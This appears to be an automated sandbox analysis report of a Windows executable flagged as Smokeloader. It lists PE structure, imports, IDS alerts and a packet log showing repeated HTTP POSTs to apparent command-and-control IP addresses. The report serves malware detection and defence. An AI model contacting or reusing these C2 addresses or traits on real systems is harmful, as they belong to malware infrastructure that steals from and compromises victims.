mov dword ptr [004201F4h], edi
mov word ptr [00420220h], ss
mov word ptr [00420214h], cs
mov word ptr [004201F0h], ds
mov word ptr [004201ECh], es
mov word ptr [004201E8h], fs
mov word ptr [004201E4h], gs
pushfd
pop dword ptr [00420218h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0042020Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00420210h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0042021Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [00420158h], 00010001h
mov eax, dword ptr [00420210h]
mov dword ptr [0042010Ch], eax
mov dword ptr [00420100h], C0000409h
mov dword ptr [00420104h], 00000001h
mov eax, dword ptr [0041F008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041F00Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000C4h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e634	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x40e000	0xc390	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1d000	0x178	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1b500	0x1b600	c173ea61c5b8c95b8dd9fe083e692a0b	False	0.626007776826484	data	6.26371473137505	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1d000	0x1f02	0x2000	dcf31f9faad9936987278a6744061b17	False	0.3560791015625	data	5.5063636226432084	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x3e77bc	0x1200	5067901f9f416eaf5f2e13f92c7e71b2	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.voheba	0x407000	0x4948	0x3e00	51596dda30fc38f0df3556d6f115256d	False	0.0023941532258064517	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.yovu	0x40c000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.lobudib	0x40d000	0xc	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x40e000	0xc390	0xc400	a4912bf414f73e5b56a1f03fa5cae900	False	0.4240672831632653	data	4.406680623692904	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x40e540	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Spanish	Peru	0.3723347547974414
RT_ICON	0x40f3e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Spanish	Peru	0.47382671480144406
RT_ICON	0x40fc90	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Spanish	Peru	0.5213133640552995
RT_ICON	0x410358	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Spanish	Peru	0.536849710982659
RT_ICON	0x4108c0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Spanish	Peru	0.39927385892116185
RT_ICON	0x412e68	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Spanish	Peru	0.4148686679174484
RT_ICON	0x413f10	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Spanish	Peru	0.46557377049180326
RT_ICON	0x414898	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Spanish	Peru	0.46808510638297873
RT_STRING	0x414f40	0x55a	data			0.44452554744525546
RT_STRING	0x4154a0	0x43a	data			0.4676524953789279
RT_STRING	0x4158e0	0x130	data			0.5032894736842105
RT_STRING	0x415a10	0x73c	data			0.4195464362850972
RT_STRING	0x416150	0x686	data			0.4353293413173653
RT_STRING	0x4167d8	0x840	data			0.4237689393939394
RT_STRING	0x417018	0x768	data			0.4240506329113924
RT_STRING	0x417780	0x8c4	data			0.4180035650623886
RT_STRING	0x418048	0x7bc	data			0.41919191919191917
RT_STRING	0x418808	0x612	data			0.4395109395109395
RT_STRING	0x418e20	0x7e6	data			0.4228486646884273
RT_STRING	0x419608	0x672	data			0.43575757575757573
RT_STRING	0x419c80	0x53e	data			0.4493293591654247
RT_STRING	0x41a1c0	0x1d0	data			0.5086206896551724
RT_ACCELERATOR	0x414d78	0x18	data			1.3333333333333333
RT_GROUP_ICON	0x414d00	0x76	data	Spanish	Peru	0.6610169491525424
RT_VERSION	0x414d90	0x1ac	data			0.5794392523364486

Imports

DLL	Import
KERNEL32.dll	WriteConsoleOutputCharacterW, GetConsoleAliasExesLengthA, InterlockedDecrement, GetLogicalDriveStringsW, SetDefaultCommConfigW, GetSystemWindowsDirectoryW, GetEnvironmentStringsW, InterlockedCompareExchange, GetTimeFormatA, GetModuleHandleW, GetConsoleAliasesA, ReadConsoleOutputA, GetCommandLineA, GetVolumePathNameW, GlobalAlloc, LoadLibraryW, GetLocaleInfoW, GetProcessHandleCount, GetConsoleAliasW, GetModuleFileNameW, GetFileSize, GetStringTypeExA, GetLastError, GetProcAddress, MoveFileW, BuildCommDCBW, OpenWaitableTimerA, WriteConsoleA, GetModuleFileNameA, GetModuleHandleA, QueryMemoryResourceNotification, GetShortPathNameW, SetThreadAffinityMask, FindAtomW, OpenFileMappingA, GetSystemTime, DisconnectNamedPipe, GetThreadContext, HeapFree, HeapAlloc, Sleep, ExitProcess, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, WriteFile, GetStdHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
USER32.dll	GetMonitorInfoA, GetClassLongW
ADVAPI32.dll	GetAce

Possible Origin

Language of compilation system	Country where language is spoken	Map
Spanish	Peru

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-30T11:11:50.241243+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	50064	103.35.190.240	443	TCP
2024-11-30T11:12:26.661625+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49736	189.163.166.52	80	TCP
2024-11-30T11:12:28.539115+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49737	189.163.166.52	80	TCP
2024-11-30T11:12:30.464957+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49738	189.163.166.52	80	TCP
2024-11-30T11:12:32.393771+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49739	189.163.166.52	80	TCP
2024-11-30T11:12:34.315997+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49740	189.163.166.52	80	TCP
2024-11-30T11:12:36.283892+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49741	189.163.166.52	80	TCP
2024-11-30T11:12:38.493730+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49742	189.163.166.52	80	TCP
2024-11-30T11:12:40.415342+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49743	189.163.166.52	80	TCP
2024-11-30T11:12:42.336279+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49744	189.163.166.52	80	TCP
2024-11-30T11:12:44.476603+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49745	189.163.166.52	80	TCP
2024-11-30T11:12:46.397930+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49746	189.163.166.52	80	TCP
2024-11-30T11:12:48.544489+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49747	189.163.166.52	80	TCP
2024-11-30T11:12:50.425797+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49748	189.163.166.52	80	TCP
2024-11-30T11:12:52.340198+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49749	189.163.166.52	80	TCP
2024-11-30T11:12:54.211867+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49750	189.163.166.52	80	TCP
2024-11-30T11:12:56.083759+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49752	189.163.166.52	80	TCP
2024-11-30T11:12:57.964234+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49754	189.163.166.52	80	TCP
2024-11-30T11:12:59.830749+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49755	189.163.166.52	80	TCP
2024-11-30T11:13:01.802938+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49761	189.163.166.52	80	TCP
2024-11-30T11:13:03.676363+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49767	189.163.166.52	80	TCP
2024-11-30T11:13:05.644767+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49773	189.163.166.52	80	TCP
2024-11-30T11:13:07.570894+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49778	189.163.166.52	80	TCP
2024-11-30T11:13:09.507541+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49780	189.163.166.52	80	TCP
2024-11-30T11:13:12.097931+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49791	23.145.40.181	443	TCP
2024-11-30T11:13:15.257748+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49797	189.163.166.52	80	TCP
2024-11-30T11:13:17.454825+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49803	189.163.166.52	80	TCP
2024-11-30T11:13:19.374519+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49809	189.163.166.52	80	TCP
2024-11-30T11:13:21.288923+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49815	189.163.166.52	80	TCP
2024-11-30T11:13:23.209112+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49819	189.163.166.52	80	TCP
2024-11-30T11:13:25.128970+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49823	189.163.166.52	80	TCP
2024-11-30T11:13:27.270542+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49828	189.163.166.52	80	TCP
2024-11-30T11:13:29.204841+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49834	189.163.166.52	80	TCP
2024-11-30T11:13:31.076893+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49840	189.163.166.52	80	TCP
2024-11-30T11:13:33.046649+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49842	189.163.166.52	80	TCP
2024-11-30T11:13:34.998162+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49847	189.163.166.52	80	TCP
2024-11-30T11:13:36.925631+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49853	189.163.166.52	80	TCP
2024-11-30T11:13:39.051723+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49859	189.163.166.52	80	TCP
2024-11-30T11:13:41.033201+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49865	189.163.166.52	80	TCP
2024-11-30T11:13:42.994728+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49869	189.163.166.52	80	TCP
2024-11-30T11:13:44.395105+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49875	23.145.40.181	443	TCP
2024-11-30T11:13:47.602500+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49881	189.163.166.52	80	TCP
2024-11-30T11:13:49.522920+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49887	189.163.166.52	80	TCP
2024-11-30T11:13:51.429121+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49890	189.163.166.52	80	TCP
2024-11-30T11:13:53.395941+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49896	189.163.166.52	80	TCP
2024-11-30T11:13:55.345806+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49902	189.163.166.52	80	TCP
2024-11-30T11:13:57.270618+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49908	189.163.166.52	80	TCP
2024-11-30T11:13:59.357155+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49912	189.163.166.52	80	TCP
2024-11-30T11:14:01.341053+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49915	189.163.166.52	80	TCP
2024-11-30T11:14:03.218592+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49921	189.163.166.52	80	TCP
2024-11-30T11:14:05.094798+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49927	189.163.166.52	80	TCP
2024-11-30T11:14:07.246905+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49932	189.163.166.52	80	TCP
2024-11-30T11:14:09.171651+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49937	189.163.166.52	80	TCP
2024-11-30T11:14:11.136134+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49941	189.163.166.52	80	TCP
2024-11-30T11:14:13.297021+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49946	189.163.166.52	80	TCP
2024-11-30T11:14:15.211720+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49953	189.163.166.52	80	TCP
2024-11-30T11:14:17.129851+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49959	189.163.166.52	80	TCP
2024-11-30T11:14:56.054784+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49949	207.246.75.248	443	TCP
2024-11-30T11:15:29.907269+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50061	123.213.233.131	80	TCP
2024-11-30T11:15:39.774346+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50062	123.213.233.131	80	TCP
2024-11-30T11:15:50.872341+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50065	123.213.233.131	80	TCP
2024-11-30T11:16:02.791232+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	50066	123.213.233.131	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2024 11:12:24.786530018 CET	49736	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:24.907808065 CET	80	49736	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:24.907888889 CET	49736	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:24.908046961 CET	49736	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:24.908066034 CET	49736	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:25.027981997 CET	80	49736	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:25.028008938 CET	80	49736	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:26.650377035 CET	80	49736	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:26.661560059 CET	80	49736	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:26.661624908 CET	49736	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:26.662062883 CET	49736	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:26.664829969 CET	49737	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:26.782062054 CET	80	49736	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:26.784884930 CET	80	49737	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:26.785077095 CET	49737	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:26.785270929 CET	49737	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:26.785303116 CET	49737	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:26.905157089 CET	80	49737	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:26.906296015 CET	80	49737	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:28.533607960 CET	80	49737	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:28.539052010 CET	80	49737	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:28.539114952 CET	49737	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:28.539167881 CET	49737	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:28.542660952 CET	49738	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:28.659298897 CET	80	49737	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:28.662678003 CET	80	49738	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:28.662743092 CET	49738	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:28.662853003 CET	49738	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:28.662890911 CET	49738	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:28.782820940 CET	80	49738	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:28.782876968 CET	80	49738	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:30.464797974 CET	80	49738	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:30.464907885 CET	80	49738	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:30.464956999 CET	49738	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:30.465029001 CET	49738	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:30.467318058 CET	49739	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:30.585114002 CET	80	49738	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:30.587481976 CET	80	49739	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:30.587569952 CET	49739	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:30.587718010 CET	49739	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:30.587743998 CET	49739	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:30.708878040 CET	80	49739	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:30.708906889 CET	80	49739	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:32.393549919 CET	80	49739	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:32.393630981 CET	80	49739	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:32.393770933 CET	49739	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:32.393804073 CET	49739	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:32.396136045 CET	49740	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:32.513982058 CET	80	49739	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:32.516309023 CET	80	49740	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:32.516407967 CET	49740	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:32.517201900 CET	49740	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:32.517262936 CET	49740	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:32.637135983 CET	80	49740	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:32.637257099 CET	80	49740	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:34.315684080 CET	80	49740	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:34.315912008 CET	80	49740	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:34.315996885 CET	49740	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:34.335463047 CET	49740	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:34.369910002 CET	49741	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:34.455459118 CET	80	49740	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:34.490037918 CET	80	49741	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:34.490101099 CET	49741	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:34.490216017 CET	49741	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:34.490226030 CET	49741	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:34.610347986 CET	80	49741	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:34.610409975 CET	80	49741	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:36.283663034 CET	80	49741	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:36.283819914 CET	80	49741	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:36.283891916 CET	49741	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:36.284030914 CET	49741	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:36.286278963 CET	49742	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:36.404022932 CET	80	49741	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:36.406249046 CET	80	49742	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:36.406349897 CET	49742	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:36.406519890 CET	49742	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:36.406564951 CET	49742	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:36.527091026 CET	80	49742	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:36.527527094 CET	80	49742	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:38.493619919 CET	80	49742	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:38.493659973 CET	80	49742	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:38.493730068 CET	49742	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:38.493901968 CET	49742	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:38.496118069 CET	49743	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:38.614129066 CET	80	49742	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:38.616069078 CET	80	49743	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:38.616153955 CET	49743	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:38.616270065 CET	49743	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:38.616338015 CET	49743	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:38.736273050 CET	80	49743	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:38.736319065 CET	80	49743	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:40.403886080 CET	80	49743	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:40.415250063 CET	80	49743	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:40.415342093 CET	49743	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:40.415376902 CET	49743	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:40.418051958 CET	49744	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:40.536046028 CET	80	49743	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:40.538872004 CET	80	49744	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:40.538949966 CET	49744	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:40.539100885 CET	49744	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:40.539115906 CET	49744	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:40.659393072 CET	80	49744	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:40.659476042 CET	80	49744	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:42.335429907 CET	80	49744	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:42.336205959 CET	80	49744	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:42.336278915 CET	49744	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:42.336317062 CET	49744	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:42.338871002 CET	49745	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:42.459860086 CET	80	49744	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:42.461201906 CET	80	49745	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:42.461308956 CET	49745	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:42.461447954 CET	49745	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:42.461447954 CET	49745	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:42.583837032 CET	80	49745	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:42.585999966 CET	80	49745	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:44.476198912 CET	80	49745	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:44.476545095 CET	80	49745	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:44.476603031 CET	49745	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:44.476634026 CET	49745	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:44.479034901 CET	49746	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:44.598704100 CET	80	49745	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:44.601094007 CET	80	49746	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:44.601171017 CET	49746	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:44.601337910 CET	49746	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:44.601353884 CET	49746	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:44.723973989 CET	80	49746	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:44.724148989 CET	80	49746	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:46.397649050 CET	80	49746	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:46.397878885 CET	80	49746	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:46.397929907 CET	49746	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:46.400681973 CET	49746	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:46.407629013 CET	49747	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:46.520601988 CET	80	49746	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:46.527987957 CET	80	49747	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:46.528069019 CET	49747	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:46.529252052 CET	49747	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:46.529280901 CET	49747	80	192.168.2.4	189.163.166.52
Nov 30, 2024 11:12:46.649240017 CET	80	49747	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:46.649282932 CET	80	49747	189.163.166.52	192.168.2.4
Nov 30, 2024 11:12:48.544128895 CET	80	49747	189.163.166.52	192.168.2.4
